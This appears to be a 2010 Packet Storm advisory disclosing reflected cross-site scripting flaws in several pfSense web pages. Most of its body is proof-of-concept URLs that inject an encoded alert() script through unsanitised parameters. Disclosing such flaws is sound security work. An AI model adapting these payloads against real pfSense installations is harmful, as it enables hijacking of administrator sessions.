pfSense Cross Site Scripting

2010-11-08T00:00:00
ID PACKETSTORM:95575
Type packetstorm
Reporter dave b
Modified 2010-11-08T00:00:00

Description

                                        
                                            `"Those who cannot learn from history are doomed to repeat it." -  
George Santayana  
  
http://cvstrac.pfsense.org/chngview?cn=20994  
"Comment: Make scripts XSS input safe. "  
Date: 2008-Feb-11 23:33:24 (local) 2008-Feb-12 04:33:24 (UTC)  
  
So in 2010, pfsense 2 beta 4:  
  
...  
xss -> pkg_edit.php  
https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E  
  
xss -> pkg.php  
https://10.0.20.220/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
...  
  
-----------  
in pfsense 2 beta 4:  
xss -> status_graph.php  
  
https://10.0.20.220/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
  
xss -> interfaces.php  
https://10.0.20.220/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
-------------  
  
And in pfsense (stable and 2 beta 4):  
http://10.0.20.222/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname=  
or http://10.0.20.222/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
  
--  
question = ( to ) ? be : ! be; -- Wm. Shakespeare  
  
`